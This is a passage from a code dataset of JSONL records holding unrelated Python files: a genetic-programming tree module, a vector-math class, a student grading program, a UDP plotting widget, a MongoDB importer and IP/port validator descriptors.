if self.depth >= 1:\n prim = choice(self.set_dict[\"primitives\"])\n elif self.depth == 0:\n prim = choice(self.set_dict[\"terminals\"])\n\n self[n] = Node(prim, self.primitives[prim])\n self._grow(s, m, 2*n+1)\n self._grow(s, m, 2*n+2)\n elif (n < m):\n if parent is None or parent.value not in \\\n self.set_dict[\"functions\"]:\n self[n] = None\n else:\n prim = choice(self.set_dict[\"primitives\"])\n self[n] = Node(prim, self.primitives[prim])\n self._grow(s, m, 2*n+1)\n self._grow(s, m, 2*n+2)\n elif (n < s):\n if parent is None or parent.value not in \\\n self.set_dict[\"functions\"]:\n self[n] = None\n else:\n self[n] = Node(choice(self.set_dict[\"terminals\"]), 0)\n\n def build_program(self, n=0):\n strng = \"\"\n if n < self.size and self[n] != None:\n 
strng = self[n].value\n left = self.build_program(2*n+1)\n right = self.build_program(2*n+2)\n strng = \"(\" + left + strng + right + \")\"\n\n return strng\n\n def display(self):\n contents = []\n for item in self:\n try:\n contents.append(item.value)\n except AttributeError:\n contents.append(None)\n return contents\n\n def get_rand_terminal(self):\n \"\"\"Returns the index of a random terminal\"\"\"\n try:\n index = randint(0, self.size - 1)\n except RuntimeError:\n print(\"A recursion depth limit exceeded error occurred. The \\\n offending program is:\")\n print(self.display())\n if (self[index] is None) or (self[index].value in\n self.set_dict[\"functions\"]):\n return self.get_rand_terminal()\n\n return index\n\n def get_rand_function(self):\n \"\"\"Returns the index of a random function, or raises an error if tree\n does not contain one\n \"\"\"\n if (self[0] is None) or (self[0].value not in self.set_dict[\"functions\"]):\n raise NodeSelectionError\n\n index = randint(0, self.last_level - 1)\n if (self[index] is None) or (self[index].value not in\n self.set_dict[\"functions\"]):\n return self.get_rand_function()\n\n return index\n\n def get_rand_node(self):\n index = randint(0, self.size-1)\n if self[index] != None:\n return index\n\n return self.get_rand_node()\n\n def get_subtree(self, n, depth=0):\n \"\"\"Retrieves and returns as a list the subtree starting at index n\"\"\"\n if n >= len(self):\n return []\n\n start = n\n stop = (2 ** depth) + n\n subtree = self[start:stop]\n return subtree + self.get_subtree(start*2+1, depth+1)\n\n def _fill_subtree(self, n, subtree, depth=0):\n \"\"\"Takes in a subtree as a list and a starting index n, and\n re-populates the subtree rooted at self[n] with the contents of\n subtree\n \"\"\"\n if n >= self.size:\n return\n\n start = n\n stop = (2 ** depth) + n\n for i in range(start,stop):\n self[i] = subtree.pop(0)\n self._fill_subtree(start*2+1, subtree, depth+1)\n\n def _pad(self, n, subtree):\n \"\"\"Takes in a 
starting node index n and a subtree as a list, and pads\n the tree if the subtree would extend beyond the deepest level, or the\n subtree if it does not extend down to the tree's deepest level\n \"\"\"\n old = self.get_subtree(n)\n new = subtree\n nodes_in_old = len(old)\n nodes_in_new = len(new)\n\n if nodes_in_new == nodes_in_old:\n return\n\n if nodes_in_new < nodes_in_old:\n new.extend([None]*(int(next_level_size(nodes_in_new))))\n elif nodes_in_new > nodes_in_old:\n self.extend([None]*(int(next_level_size(self.size))))\n self.size = len(self)\n\n self._pad(n, new)\n\n def replace_subtree(self, n, subtree):\n \"\"\"Takes in a subtree and starting node n, and replaces the original\n subtree beginning at node n with the new one\n \"\"\"\n self._pad(n, subtree)\n self._fill_subtree(n, subtree)\n\n\n\"\"\"Error classes\"\"\"\n\n\nclass SingularityError(Exception):\n\n def __init__(self):\n self.msg = 'the function called has a singularity'\n\n def __str__(self):\n return self.msg\n\n\nclass UnfitError(Exception):\n\n def __init__(self):\n self.msg = 'the individual has a fitness score too large to be represented'\n\n def __str__(self):\n return self.msg\n\n\nclass NodeSelectionError(Exception):\n\n def __init__(self):\n self.msg = 'at least one tree does not have any function nodes, \\\nfunction crossover cannot be performed'\n\n def __str__(self):\n return self.msg\n\n\n\"\"\"Functions for working with individual trees\"\"\"\n\n\ndef get_depth(k):\n \"\"\"Takes the size k of a binary tree and returns its depth\"\"\"\n return int(log2(k + 1) - 1)\n\n\ndef next_level_size(k):\n \"\"\"Takes a tree size (number of nodes) k and returns the number of nodes\n that would be in the next deeper level\n \"\"\"\n d = get_depth(k)\n d = d + 1\n return 2 ** d\n\n\n\"\"\"Tree recombination and mutation functions for user use\"\"\"\n\n\ndef subtree_crossover(population, n, data):\n \"\"\"Takes a population, performs 2 tournament selections with sample size n,\n performs subtree 
crossover on the winners, and returns a new tree\n \"\"\"\n exception_occurred = False\n first_parent = tournament(population, n, data)\n second_parent = tournament(population, n, data) # This returned a None- probably because all programs failed\n # make tournament recursive\n choice1 = random()\n choice2 = random()\n if choice1 < 0.9:\n try:\n cross_pt1 = first_parent.get_rand_function()\n except NodeSelectionError:\n exception_occurred = True\n else:\n cross_pt1 = first_parent.get_rand_terminal()\n\n if choice2 < 0.9:\n try:\n cross_pt2 = second_parent.get_rand_function()\n except NodeSelectionError:\n exception_occurred = True\n else:\n cross_pt2 = second_parent.get_rand_terminal()\n\n if exception_occurred == False:\n return _crossover(first_parent, second_parent, cross_pt1, cross_pt2)\n\n return subtree_crossover(population, n, data)\n\n\ndef subtree_mutation(tree, max_depth):\n \"\"\"Takes in a tree and parameters for generating a new tree, and returns\n a copy of the original tree with a subtree replaced by the new tree\n \"\"\"\n p = tree.primitives\n s = tree.set_dict\n init_options = ['full', 'grow']\n subtree = BinaryTree(p, s, choice(init_options), randint(0, max_depth))\n return _crossover(tree, subtree, tree.get_rand_node(), 0)\n\n\ndef point_mutation():\n pass\n\n\ndef reproduction(population, n, data):\n \"\"\"Performs a single tournament selection and returns a copy of the most\n fit individual\n \"\"\"\n winner = tournament(population, n, data)\n return deepcopy(winner)\n\n\n\"\"\"Functions used in fitness evaluation, recombination, and mutation\"\"\"\n\n\ndef fitness(tree, dataset):\n \"\"\"variables is a list of strings denoting variable names, and dataset is\n a list of tuples of floats denoting variable values\n \"\"\"\n prog = tree.build_program()\n variables = tree.set_dict[\"variables\"]\n m = len(variables)\n tot_err = 0\n for item in dataset:\n for i in range(m):\n vars()[variables[i]] = item[i]\n try:\n dvar_actual = item[-1]\n 
dvar_calc = eval(prog)\n err = abs(dvar_actual - dvar_calc)\n tot_err = tot_err + err\n except ZeroDivisionError:\n raise SingularityError\n except OverflowError:\n raise UnfitError\n\n return tot_err\n\n\ndef tournament(population, n, data):\n \"\"\"Performs tournament selection, randomly choosing n individuals from the\n population and thunderdome-ing it, returning the individual with the best\n fitness\n \"\"\"\n pop_sample = sample(population, n)\n best = None\n best_score = None\n for item in pop_sample:\n try:\n score = fitness(item, data)\n if (best_score == None) or (score < best_score):\n best = item\n best_score = score\n except SingularityError:\n pass\n except UnfitError:\n pass\n\n if best == None:\n return tournament(population, n, data)\n\n return best\n\n\ndef _crossover(tree1, tree2, cross_pt1, cross_pt2):\n \"\"\"Takes two tree objects and a crossover index on each and returns a copy\n of the first tree with the subtree rooted at the first crossover point\n replaced by the subtree rooted at the second point on the second tree\n \"\"\"\n tree1copy = deepcopy(tree1)\n tree2copy = deepcopy(tree2)\n sub = tree2copy.get_subtree(cross_pt2)\n tree1copy.replace_subtree(cross_pt1, sub)\n return tree1copy\n\n\ndef termination_test(population, data):\n \"\"\"Tests the fitness of every member of the population, returning the\n individual with the best fitness and that fitness as a tuple\n \"\"\"\n pop_sample = sample(population, len(population)-1)\n best = None\n best_score = None\n for item in pop_sample:\n try:\n score = fitness(item, data)\n if (best_score == None) or (score < best_score):\n best = item\n best_score = score\n except SingularityError:\n pass\n except UnfitError:\n pass\n\n return best, best_score\n\n##Another method that extracts headers and passes a tuple for automatic variable\n##generation; could import a data file as a list of tuples and then use pop to\n##return the 
headers\n","sub_path":"pygp.py","file_name":"pygp.py","file_ext":"py","file_size_in_byte":13055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"38965481","text":"from sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef table_init(engine, name):\n Base = automap_base()\n Base.prepare(engine, reflect=True)\n DBSession = sessionmaker(bind=engine)\n session = DBSession()\n return getattr(Base.classes, name), session\n","sub_path":"stock_increment_tools/files/config/table_init.py","file_name":"table_init.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"348088201","text":"\"\"\"\nSimple command line functions for taking text copied from espacenet and cleaning it for use in a form.\n\"\"\"\n\n\n\ndef flipdate(date):\n \"\"\"\n Flips an x-y-z format date string into a z-y-x format date string.\n\n :param date: a string that represents a date in any x-y-z format.\n :return: a string representing the same date in z-y-x format.\n \"\"\"\n\n date = date.split(\"-\")\n date.reverse()\n return \"-\".join(date)\n\n\ndef clean_compact_family_text(famtext, flip=True):\n \"\"\"\n Takes the string copied from the espacenet page showing a compact family and cleans it up for use in an ISR.\n\n :param famtext: string copied from the espacenet fampat compact family listing\n :return: a list of the family members in a format suitable for the ISR.\n \"\"\"\n\n list01 = famtext.split(\"\\n\")\n list01 = [l.strip() for l in list01]\n list02 = [l.replace(\"(\",\"\").replace(\")\",\"\") for l in list01]\n list03 = [l for l in list02 if not l[0].isdigit() and \"info\" not in l]\n for l in list03:\n l = l.split(\"\\t\")\n date = flipdate(l[1]) if flip else l[1]\n print(\"\\t\"*6 + l[0] + \"\\t\\t\" + 
date)","sub_path":"espacenet_scraping.py","file_name":"espacenet_scraping.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"450174659","text":"from math import acos, cos, sqrt, pi\nfrom decimal import getcontext\nfrom decimal import Decimal as dec\n\ngetcontext().prec = 30\n\nclass Vector(object):\n \n CANNOT_NORMALIZE_ZERO_VECTOR_MSG = \"Cannot normalize zero vector\"\n NO_UNIQUE_COMPONENT_PARALLEL_MSG = \"There is no unique parallel component to the zero vector\"\n PRECISION = 5\n TOLERANCE = 1e-10\n \n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([round(dec(x), self.PRECISION) for x in coordinates])\n self.dimension = len(self.coordinates)\n\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n \n @property\n def magnitude(self) -> dec:\n '''Returns magnitude (length) of this vector'''\n return dec(sqrt(sum([x**dec('2.0')for x in self.coordinates])))\n \n @property\n def normalized(self):\n '''Returns normalized coordinates for this vector'''\n if float(self.magnitude) == 0:\n raise ZeroDivisionError(self.CANNOT_NORMALIZE_ZERO_VECTOR_MSG)\n return self.times_scalar(dec(\"1.0\")/self.magnitude)\n \n @property\n def is_zero_vector(self, tolerance=TOLERANCE):\n '''Returns True if this vector is the zero vector, False if not'''\n return self.magnitude < tolerance\n\n def __add_zero_dimension(self):\n '''Returns vector that is identical to self but with additional 0 coordinate'''\n new_coords = [float(x) for x in self.coordinates]\n new_coords.append(0.0)\n return Vector(new_coords)\n \n def cross(self, vector):\n '''Returns a Vector which is the cross product of this vector and the referenced one'''\n try: \n assert 2 <= self.dimension <= 3 and 2 <= vector.dimension <= 3\n except AssertionError:\n raise 
AssertionError(\"Vectors must be of dimension 2 or 3 to use cross product\")\n v_self = self.__add_zero_dimension() if self.dimension == 2 else Vector(self.coordinates) \n w_vector = vector.__add_zero_dimension() if vector.dimension == 2 else Vector(vector.coordinates)\n\n cross_coords = []\n cross_coords.append((v_self.coordinates[1] * w_vector.coordinates[2]) - (w_vector.coordinates[1] * v_self.coordinates[2]))\n cross_coords.append(-((v_self.coordinates[0] * w_vector.coordinates[2]) - (w_vector.coordinates[0] * v_self.coordinates[2])))\n cross_coords.append((v_self.coordinates[0] * w_vector.coordinates[1]) - (w_vector.coordinates[0] * v_self.coordinates[1]))\n\n return Vector(cross_coords)\n\n\n def area_of_parallelogram_with(self, vector):\n return round((self.cross(vector).magnitude), self.PRECISION)\n\n def area_of_triangle_with(self, vector):\n return round((self.area_of_parallelogram_with(vector)) / dec(\"2\"), self.PRECISION)\n\n def component_orthogonal_to(self, basis):\n '''Returns the component of this vector that is orthogonal to the basis vector'''\n try:\n projection = self.component_parallel_to(basis)\n return self.minus(projection)\n except Exception as e:\n if str(e) == self.NO_UNIQUE_COMPONENT_PARALLEL_MSG:\n raise Exception(self.NO_UNIQUE_COMPONENT_PARALLEL_MSG)\n else:\n raise e\n \n def component_parallel_to(self, basis):\n '''Returns the component of this vector that is parallel to the basis vector'''\n try:\n u = basis.normalized\n weight = self.dot(u)\n return u.times_scalar(weight)\n except Exception as e:\n if str(e) == self.CANNOT_NORMALIZE_ZERO_VECTOR_MSG:\n raise Exception(self.NO_UNIQUE_COMPONENT_PARALLEL_MSG)\n else:\n raise e\n \n def is_orthogonal_to(self, vector, tolerance=TOLERANCE):\n '''Returns True if referenced vector is orthagonal to this one, otherwise False'''\n return abs(self.dot(vector)) < tolerance\n \n def is_parallel_to(self, vector):\n '''Returns True if referenced vector is parallel to this one, otherwise 
False'''\n if self.is_zero_vector or vector.is_zero_vector: return True\n return (self.degrees_from(vector)==0 or self.degrees_from(vector)==pi)\n \n def plus(self, vector):\n '''Returns a Vector which is the result of adding vector to this one.'''\n if vector.dimension != self.dimension:\n raise ValueError(f\"Vectors must have of dimension {vector.dimension} \\\n to be added to this vector\")\n \n new_coordinates = [x + y for x, y in zip(self.coordinates, vector.coordinates)]\n return Vector(new_coordinates)\n \n def minus(self, vector):\n '''Returns a vector which is the result of subtracting a vector from this one.'''\n if vector.dimension != self.dimension:\n raise ValueError(f\"Vectors must have of dimension {vector.dimension} \\\n to be added to this vector\")\n \n new_coordinates = [x - y for x, y in zip(self.coordinates, vector.coordinates)]\n return Vector(new_coordinates)\n \n def times_scalar(self, scalar: float):\n '''Returns a Vector which is the result of multiplying this vector by a scalar'''\n new_coordinates = [x * dec(scalar) for x in self.coordinates]\n return Vector(new_coordinates)\n \n def dot(self, vector):\n '''Returns the dot product of this vector and the referenced vector'''\n return sum([x * y for x, y in zip(self.coordinates, vector.coordinates)])\n \n def radians_from(self, vector):\n '''Returns angle in radians between this vector and the referenced vector'''\n try:\n u1 = self.normalized\n u2 = vector.normalized\n except Exception as e:\n if str(e) == self.CANNOT_NORMALIZE_ZERO_VECTOR_MSG:\n raise Exception(\"Cannot compute an angle with the zero vector\")\n else:\n raise e\n return acos(u1.dot(u2))\n \n def degrees_from(self, vector):\n '''Returns angle in degrees between this vector and the referenced vector'''\n return dec(self.radians_from(vector))*(dec(\"180\")/dec(f\"{pi}\"))\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n\n def __eq__(self, v):\n return self.coordinates == 
v.coordinates\n","sub_path":"vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375010288","text":"import shutil\ntotal_weight=0\nclass assigmnet:\n def __init__(self, assignment_num, assignment_name):\n self.__assignment_name=assignment_name\n self.__assignment_num=assignment_num\n\n @property\n def assignment_name(self):\n return self.__assignment_name\n @property\n def assignment_num(self):\n return self.__assignment_num\n \n @assignment_name.setter\n def assignment_name(self, assignment_name):\n self.__assignment_name=assignment_name\n\n @assignment_num.setter\n def assignment_num(self, assignment_num):\n self.__assignment_num=assignment_num\n\n def display(self):\n print(\"Assignment Name:\"+str(self.assignment_name)+\"\\nAssignment Num:\"+str(self.assignment_num))\n return\n\n\n\n\nclass Semester(assigmnet):\n def __init__(self, assignment_name=None,assignment_num=None, test=None, exam=None, weight=None):\n super().__init__(assignment_name,assignment_num)\n self.__test=test\n self.__exam=exam\n self.__weight=weight\n self.total_weight=total_weight\n \n #@property\n #def assignment(self):\n # return self.__assignment\n #@property\n #def assignment_num(self):\n # return self.__assignment_num\n #@assignment.setter\n #def assignment(self, assignment):\n # self.__assignment=assignment\n\n @property\n def test(self):\n return self.__test\n @test.setter\n def test(self, test):\n self.__test=test\n\n @property\n def exam(self):\n return self.__exam\n @exam.setter\n def exam(self, exam):\n self.__exam=exam\n\n @property\n def weight(self):\n self.__weight\n @weight.setter\n def weight(self, weight):\n self.__weight=weight\n \n g=open(\"Policy\",'w')\n g.write(\"Assignment Num \\t\\t\\t Assignment Name \\t\\t\\t Exam Score\")\n g.close()\n #add assignment\n def add_assignment(self,weight, assignment_num:list(range(4)), 
assignment_name:list(range(4))):\n global total_weight\n total_weight=total_weight+weight\n print(total_weight)\n if total_weight>101:\n raise ValueError \n \n self.assignment=weight,assignment_num,assignment_name\n g=open(\"Policy\", 'a')\n g.write(\"\\n\\nAssignmnet Num \\t\\t Assignment Name \\t\\t Assignment Wight\\n\"+str(self.assignment[2])+\" \\t\\t\\t\\t\\t\\t \"+str(self.assignment[1])+\" \\t\\t\\t\\t\\t \"+str(self.assignment[0]))\n g.close()\n \n \n return self.assignment\n \n g=open(\"Policy\",'w')\n g.write(\"Assignment Num \\t\\t\\t Assignment Name \\t\\t\\t Exam Score\")\n g.close() \n #add test\n def add_test(self, weight, test_num:list(range(4)), test_name:list(range(4))):\n global total_weight\n total_weight=total_weight+weight\n print(total_weight)\n if total_weight>101:\n raise ValueError \n self.test=test_num, test_name,weight\n g=open(\"Policy\", 'a')\n g.write(\"\\n\\nTest Num \\t\\t Test Name \\t\\t Test Wight\\n\"+str(self.test[0])+\" \\t\\t\\t\\t \"+str(self.test[1])+\" \\t\\t\\t \"+str(self.test[2]))\n g.close()\n return self.test\n g=open(\"Policy\",'w')\n g.write(\"Assignment Num \\t\\t\\t Assignment Name \\t\\t\\t Exam Score\")\n g.close()\n def add_exam(self, weight,exam_num:list(range(1)), exam_name:list(range(1))):\n global total_weight\n total_weight=total_weight+weight\n print(total_weight)\n if total_weight>101:\n raise ValueError \n self.exam=exam_num, exam_name, weight\n g=open(\"Policy\", 'a')\n g.write(\"\\n\\nExam Num \\t\\t Exam Name \\t\\t Exam Wight\\n\"+str(self.exam[0])+\" \\t\\t\\t\\t\\t\\t \"+str(self.exam[1])+\" \\t\\t\\t\\t\\t \"+str(self.exam[2]))\n g.close()\n return self.exam\n \n def calculate_weight(self):\n self.weight=self.assignment[2]+self.test[2]+self.exam[2]\n if self.weight<=100:\n print(\"Your Wieght is balance\")\n else:\n print(\"Your Weightage is unbalance please modify your Weight\")\n g=open(\"Policy\", 'r')\n print(g)\n return self.weight\n \n \n \n #Test\n def display(self):\n print( \"Assignment 
Num: \"+str(self.assignment[0])+\"\\nAssignment Name: \"+str(self.assignment[1]))\n #test=print( \"Test Num: \"+str(self.test_num)+\"\\nTest Name: \"+str(self.test_num))\n\n\n\nclass Student:\n def __init__(self, student_id=None, student_fname=None, student_lname=None):\n self.__student_id=student_id\n self.__student_fname=student_fname\n self.__student_lname=student_lname\n\n @property\n def student_id(self):\n return self.__student_id\n @student_id.setter\n def student_id(self, student_id):\n self.__student_id=student_id\n\n @property\n def student_fname(self):\n return self.__student_fname\n @student_fname.setter\n def student_fname(self, student_fname):\n self.__student_fname=student_fname\n\n @property\n def student_fname(self):\n return self.__student_fname\n @student_fname.setter\n def student_fname(self, student_fname):\n self.__student_fname=student_fname\n\n def add_student(self, student_id, student_fname, student_lname):\n self.student=(student_id,student_fname,student_lname)\n\n return self.student\n\n def __student__(self):\n self.__student_id\n self.__student_fname\n self.__student_lname\n\n return self.__student__\n\n \n def display(self):\n print(\"Student ID: \"+str(self.student_id)+\"\\nStudent First Name: \"+str(self.student_fname)+\"\\nStudent Last Name: \"+str(self.__student_lname))\n \n\nclass score(Semester, Student):\n \n \n \n \n\n @property\n def score(self):\n return self.__score\n\n @score.setter\n def score(self, score):\n self.__score=score\n\n \n\n def add_assignment_score(self):\n \n validate=input(\"Enter Assignment number: \")\n if validate == super().assignment_num:\n for student_id in self.__student__:\n self.score=float(input(\"Enter Score for \")+str(student_id))\n score<=100\n return None\n\n def display(self):\n print( \"Student ID: \"+str(self.score[1])+\"\\n added Score\\n Assignment Num: \"+str(self.score[0])+\"\\nAssigment Score: \"+str(self.score[2]))\n\nclass exam_score(Semester, Student):\n def __init__(self, 
student_id=None, test=None, exam=None, test_score=None, exam_score=None,student=None):\n super().__init__(test, exam,student_id)\n self.__test_score=test_score\n self.__exam_score=exam_score\n self.student_id=student_id\n self.student=Student.add_student\n\n @property\n def test_score(self):\n return self.__test_score\n @test_score.setter\n def test_score(self, test_score):\n self.__test_score=test_score\n\n @property\n def exam_score(self):\n return self.__exam_score\n @exam_score.setter\n def exam_score(self, exam_score):\n self.__exam_score=exam_score\n\n\n def S_id(self):\n return Student.student_id\n\n g=open(\"Grade\",'w')\n g.write(\"Student ID \\t\\t Test Name \\t\\t Test Score\")\n g.close()\n def add_test_score(self, student_id, test, test_score):\n \n self.test_score=(student_id, test, test_score)\n g=open(\"Grade\",'a')\n g.write(\"\\n\"+str(self.test_score[0])+\"\\t\\t\\t\\t\\t\\t\"+str(self.test_score[1])+\"\\t\\t\\t\\t\\t\\t\"+str(self.test_score[2]))\n g.close()\n print(\"Student ID: \"+str(self.test_score[0])+\"\\nTest Name: \"+str(self.test_score[1])+\"\\nTest Score: \"+str(self.test_score[2]))\n return self.test_score\n\n\n\n g=open(\"Grade\",'w')\n g.write(\"Student ID \\t\\t\\t Exam Name \\t\\t\\t Exam Score\")\n g.close()\n def add_exam_score(self, student_id, exam, exam_score):\n \n self.exam_score=student_id,exam,exam_score\n g=open(\"Grade\",'a')\n g.write(\"\\n\"+str(self.exam_score[0])+\"\\t\\t\\t\\t\\t\\t\"+str(self.exam_score[1])+\"\\t\\t\\t\\t\\t\\t\"+str(self.exam_score[2]))\n g.close()\n \n \n return self.exam_score\n \n \n \n def test_display(self):\n print()\n \n \n def exam_save(self):\n print()\n \n \n\n \n \n\n \n\n \n\ndef main():\n #Tester \n #st=assigmnet(1,\"Java\")\n #st.add_assignment(2,\"Java ad\")\n #st2=Semester(1,\"Java\",\"test\",\"exam\",100)\n #st2.add_assignment(2,\"Java ad\",11)\n #st2.display()\n #st2=Student(19549,\"Patel\",\"Jenish\")\n #st2.display()\n \n #st2.add_test(20,1,\"Test1\")\n #st2.display()\n 
#s2=score()\n #s2.add_assignment_score()\n #st2=exam_score()\n #st2.add_test_score(18762, \"Mid1\", 54)\n #st2.add_test_score(19549, \"Mid1\", 66)\n #st2.add_exam_score(Student.student_id, \"E1\", 78)\n \n \n \n #st1.display()\n #st2=score()\n #st2.add_assignment_score(st2.assignment_name,st2.student_id,23)\n #st2.display()\n #st2=exam_score()\n #st2.add_test_score(st2.student_id,st2.test,45)\n #st2.test_display()\n \n \n\n \n while KeyboardInterrupt:\n print(\"1:Add Assignments\\n2:Add Test\\n3:Add Exam\\n4:calculate the wightage\\n5:Add Student\\n6:Add Score to Assigmnet\\n7:Add score to Test\\n8:Add score to exam\\n9:Save the file \")\n user_input=int(input(\"Please choice following Menu: \"))\n \n if(user_input == 1):\n try:\n s=Semester()\n s.add_assignment(float(input(\"Enter Weight: \")),input(\"Add assingment name: \"), input(\"Enter assignment num: \"))\n except ValueError: \n g=open(\"Policy\",'r')\n print(g.read())\n print(\"\\nWARNING\\nThe Weight is Unbalance Please ENTER AGAIN\")\n s.add_assignment(float(input(\"Enter Weight: \")),input(\"Add assingment name: \"), input(\"Enter assignment num: \"))\n \n \n \n elif(user_input == 2):\n try:\n s=Semester()\n s.add_test(float(input(\"Enter Weight: \")), int(input(\"Enter Test num: \")), input(\"Enter Test name: \"))\n except ValueError: \n g=open(\"Policy\",'r')\n print(g.read())\n print(\"\\nWARNING\\nThe Weight is Unbalance Please ENTER AGAIN\")\n s.add_assignment(float(input(\"Enter Weight: \")),input(\"Add assingment name: \"), input(\"Enter assignment num: \"))\n elif(user_input == 3):\n try:\n s=Semester()\n s.add_exam(float(input(\"Enter Weight: \")), int(input(\"Enter exam num: \")), input(\"Enter Exam name: \"))\n except ValueError: \n g=open(\"Policy\",'r')\n print(g.read())\n print(\"\\nWARNING\\nThe Weight is Unbalance Please ENTER AGAIN\")\n s.add_assignment(float(input(\"Enter Weight: \")),input(\"Add assingment name: \"), input(\"Enter assignment num: \"))\n elif(user_input==4):\n 
Semester.calculate_weight()\n elif(user_input==5):\n w=Student()\n w.add_student(int(input(\"Enter a StudentId: \")), input(\"Enter Student First name: \"), input(\"Enter Student Last name: \"))\n elif((user_input==6)):\n s=score()\n s.add_assignment(int(input(\"Enter wight: \")), input(\"Enter Student First Name: \"), input(\"Enter Last name: \"))\n elif(user_input==7):\n s=exam_score()\n s.add_test_score(int((input(\"Enter Student id: \"))),input(\"Test name: \"), int(input(\"Exam score: \")))\n break\n elif(user_input==8):\n s=exam_score()\n s.add_exam_score(int((input(\"Enter Student id: \"))),input(\"Exam name: \"), int(input(\"Exam score: \")))\n\n elif(user_input==9):\n seen = set()\n with open('Grade') as f, open('Grade1','w') as o:\n for line in f:\n if not line.isspace() and not line in seen:\n o.write(line)\n seen.add(line)\n \n\n else:\n print(\"Error\")\n \n \n\n\n \n\n\n\n\n\n\n\n\nmain()\n","sub_path":"HW6/Hw61.py","file_name":"Hw61.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"284271727","text":"from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\nimport socket\nimport struct\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n \n self.c = 0\n self.x = []\n self.y = []\n self.x1 = []\n self.y1 = []\n self.pack = struct.pack(\">3c8f\",b\"C\",b\"2\",b\"H\", 500, 0.006, 10,\n 1,5,1,5,60)\n\n self.sock_recv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock_recv.bind(('127.0.0.1',5550))\n\n\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(10) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.onNewData)\n\n self.plotItem = self.addPlot(title=\"Points_Force\")\n\n 
self.plotDataItem = self.plotItem.plot([], pen=None, \n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n \n ####\n self.plotItem1 = self.addPlot(title=\"Points_Pos\")\n\n self.plotDataItem1 = self.plotItem1.plot([], pen=None, \n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n \n\n def setData(self, x, y):\n self.plotDataItem.setData(x, y)\n \n def setData1(self, x, y):\n self.plotDataItem1.setData(x, y)\n\n\n\n def onNewData(self):\n self.sock_send.sendto(self.pack,('127.0.0.1',5500))\n data, ip = self.sock_recv.recvfrom(1024)\n data = struct.unpack(\">3c2f\",data)\n F = data[3]\n Pos = data[4]\n self.x.append(self.c) \n self.y.append(F)\n #c += 1\n self.c += 1\n self.x1.append(self.c)\n self.y1.append(Pos)\n self.setData(self.x, self.y)\n self.setData1(self.x1,self.y1)\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n win = MyWidget()\n win.show()\n win.resize(800,600) \n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"legacy/echo/plot_f_udp.py","file_name":"plot_f_udp.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642007910","text":"from pymongo import MongoClient\nimport json\nimport pdb\n\ndef dbImport(_f):\n client = MongoClient()\n riot = client.riot\n\n for k, v in _f.iteritems():\n coll = '%s' % (k)\n for _k, _v in v.iteritems():\n coll = '%s_%s' % (k, _k)\n coll = coll.lower()\n coll = riot[coll]\n try:\n for game in _v['100']:\n game['winner'] = 100\n coll.insert_one(game)\n\n for game in _v['200']:\n game['winner'] = 200\n coll.insert_one(game)\n except Exception:\n continue\n\ndef main():\n _f = json.loads(open('./riot.json', 'r').read())\n dbImport(_f)\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"dbimport.py","file_name":"dbimport.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"201848721","text":"import logging\nimport socket\nfrom additionals.decos import Log\nfrom .check_ip import check_first_octet, check_second_third_octets, check_forth_octet, check_ip\n\n\nlogger = logging.getLogger('app.server_')\n\n\n@Log()\nclass PortVerifier:\n \"\"\"\n check for ip port\n \"\"\"\n def __set__(self, instance, value):\n if value < 1024 or value > 65535:\n logger.error(f'invalid port number {value}')\n raise ValueError(f'port is out off range 1024 - 65535, u typed {value}')\n instance.__dict__[self.name] = value\n\n def __set_name__(self, owner, name):\n self.name = name\n\n\n@Log()\nclass HostVerifier:\n \"\"\"\n check for ip address\n \"\"\"\n def __set__(self, instance, value):\n if not check_ip(value):\n try:\n ip = socket.gethostbyname(value)\n sliced_ip = ip.split('.')\n except ValueError:\n logger.error(f'ip address is incorrect {value}')\n\n else:\n sliced_ip = value.split('.')\n\n if len(sliced_ip) == 4:\n for el in range(0, 4):\n if el == 0 and check_first_octet(sliced_ip[el]) \\\n or 0 < el < 3 and check_second_third_octets(sliced_ip[el]) \\\n or el == 3 and check_forth_octet(sliced_ip[el]):\n pass\n else:\n logger.error(f'ip is incorrect {value}')\n raise ValueError('ip is incorrect')\n else:\n logger.error(f'ip is incorrect {value}')\n raise ValueError('ip is incorrect')\n\n instance.__dict__[self.name] = value\n\n def __set_name__(self, owner, name):\n self.name = name\n\n\n\n","sub_path":"part_2/lesson_7/additionals/server_descriptor.py","file_name":"server_descriptor.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39117998","text":"from asyncio import coroutines, 